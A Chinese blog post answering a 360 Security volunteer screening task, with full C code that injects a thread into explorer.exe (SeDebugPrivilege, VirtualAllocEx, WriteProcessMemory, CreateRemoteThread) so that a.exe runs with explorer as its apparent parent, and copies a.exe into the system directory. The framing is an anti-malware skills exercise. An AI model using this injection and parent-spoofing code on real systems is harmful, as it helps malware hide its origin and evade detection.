CNXCT小组的博客

非常感谢您对360 安全卫士的关注和热爱，也非常感谢您对反恶意软件工作的支持！

由于报名志愿者很多，因此我们需要对报名者的开发水平有一定的考核，请您理解！

请您完成如下题目：

================================================================

编写一个程序，在此程序中运行 a.exe，并使得a.exe认为是由explorer.exe运行它的。

================================================================

给出程序的核心代码即可。

////////////////////////////////////////////////////////////////////////////////////////////////
//
// 目的:编写一个程序，在此程序中运行a.exe，并使得a.exe认为是由explorer.exe运行它的
// Code By:Gleon Email:WinAsk@Gmail.com
/////////////////////////////////////////////////////////////////////////////
	#include <stdio.h>
	#include <windows.h>
	#include <tlhelp32.h>
struct MPARA                                //定义的远程线程参数
{
	DWORD M_LoadLibrary;
	DWORD M_GetProcAddress;
	DWORD m_cr&#101;ateProcess;
	char path[20];
	STARTUPINFO si;
	PROCESS_INFORMATION pi;

};

DWORD _stdcall FRP(MPARA *p)                          //远程函数
{
	//定义LoadLibrary和GetProcAddress
    HMODULE (_stdcall *M_LoadLibrary)(char *c);
	FARPROC (_stdcall *M_GetProcAddress)(HMODULE hmd,char *c);
	BOOL (_stdcall *m_cr&#101;ateProcess)(
  LPCTSTR lpApplicationName,// pointer to name of executable module
  LPTSTR lpCommandLine,  // pointer to command line string
  LPSECURITY_ATTRIBUTES lpProcessAttributes,  // process security attributes
  LPSECURITY_ATTRIBUTES lpThreadAttributes,   // thread security attributes
  BOOL bInheritHandles,  // handle inheritance flag
  DWORD dwCreationFlags, // creation flags
  LPVOID lpEnvironment,  // pointer to new environment block
  LPCTSTR lpCurrentDirectory,   // pointer to current directory name
  LPSTARTUPINFO lpStartupInfo,  // pointer to STARTUPINFO
  LPPROCESS_INFORMATION lpProcessInformation  // pointer to PROCESS_INFORMATION
);

	//得到传入的LoadLibrary和GetProcAddress的地址
	M_LoadLibrary=(HMODULE (_stdcall *)(char *c))p->M_LoadLibrary;
	M_GetProcAddress=(FARPROC (_stdcall *)(HMODULE hmd,char
		*c))p->M_GetProcAddress;
	m_cr&#101;ateProcess=(BOOL (_stdcall *)(
  LPCTSTR lpApplicationName,// pointer to name of executable module
  LPTSTR lpCommandLine,  // pointer to command line string
  LPSECURITY_ATTRIBUTES lpProcessAttributes,  // process security attributes
  LPSECURITY_ATTRIBUTES lpThreadAttributes,   // thread security attributes
  BOOL bInheritHandles,  // handle inheritance flag
  DWORD dwCreationFlags, // creation flags
  LPVOID lpEnvironment,  // pointer to new environment block
  LPCTSTR lpCurrentDirectory,   // pointer to current directory name
  LPSTARTUPINFO lpStartupInfo,  // pointer to STARTUPINFO
  LPPROCESS_INFORMATION lpProcessInformation  // pointer to PROCESS_INFORMATION
))p->m_cr&#101;ateProcess;
	//定义需使用的网络函数
	(*m_cr&#101;ateProcess)(NULL,p->path,NULL,NULL,1,0,NULL,NULL,&p->si,&p->pi);

 return 0;
}
unsigned long getprocid(char *pn)
{
	BOOL b;
	HANDLE hnd;
	PROCESSENTRY32 pe;

	hnd=cr&#101;ateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

	pe.dwSize=sizeof(pe);
	b=Process32First(hnd,&pe);
	while(b)
	{
		if(stricmp(pn,pe.szExeFile)==0)return pe.th32ProcessID;
		b=Process32Next(hnd,&pe);
	}

	return 0;
}

BOOL SetAut()            //提权限
{
	HANDLE hProcessToken;

	OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken);

	TOKEN_PRIVILEGES tp;
	LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);

	tp.PrivilegeCount=1;
	tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;

	AdjustTokenPrivileges(hProcessToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),0,0);

	return TRUE;
}

void main()
{
	HANDLE hnd;
	DWORD dwtid;
	struct MPARA mp;
	char CurrentPath[255];
	char SystemPath[255];
	unsigned long ThreadSize=4028*2;
	GetSystemDirectory(SystemPath,sizeof(SystemPath));
	strcat(SystemPath,"\\a.exe");
	GetCurrentDirectory(sizeof(CurrentPath),CurrentPath);
	strcat(CurrentPath,"\\a.exe");
	printf("%s\n%s\n",CurrentPath,SystemPath);
	CopyFile(CurrentPath,SystemPath,1);
	SetAut();/*提升进程权限*/
	DWORD procid;
procid=getprocid("Explorer.EXE");
/*得到进程PID*/
	if(procid==0)return;
	hnd=OpenProcess(PROCESS_ALL_ACCESS,FALSE,procid);

	/*写入线程体*/
	void *lpEx=VirtualAllocEx(hnd,NULL,ThreadSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(hnd,lpEx,&FRP,ThreadSize,NULL);

	/*初始化线程参数*/

	mp.M_LoadLibrary=(DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA");
	mp.m_cr&#101;ateProcess =(DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"cr&#101;ateProcessA");
	printf("%d \n",	mp.m_cr&#101;ateProcess);
	printf("%d \n",mp.M_LoadLibrary);
//	exit(1);
	mp.M_GetProcAddress=(DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetProcAddress");
	strcpy(mp.path,"a.exe");
	ZeroMemory(&mp.pi,sizeof(mp.pi));
	ZeroMemory(&mp.si,sizeof(mp.si));
	mp.si.wShowWindow=SW_SHOW;
	/*写入线程参数*/
	void *lpPa=VirtualAllocEx(hnd,NULL,sizeof(mp),MEM_COMMIT,PAGE_READWRITE);
	WriteProcessMemory(hnd,lpPa,&mp,sizeof(mp),NULL);

	/*建立线程*/
	cr&#101;ateRemoteThread(hnd,0,0,(DWORD (_stdcall *)(void *p))lpEx,lpPa,0,&dwtid);

}

不知道对不对.!!错误的请提示 [confused] [confused] [confused]
谢谢

随机日志

• QQ游戏最新版多开补丁 (0)
• 盗梦空间之胡思乱想 (0)
• 如何精确查找PHP WEBSHELL木马？ (8)
• 恭喜Hello_World(SCY)新婚快乐! (20)
• 检测并禁用隐藏服务 (0)
• 发现个好玩的代码改写MBR (3)
• CFC4N喜欢的结婚照风格 (0)
• 写给互联网上从业的Web程序员 (0)
• 夜空的笑脸,何时再见? (2)
• 动态内存补丁取血值 [代码] (0)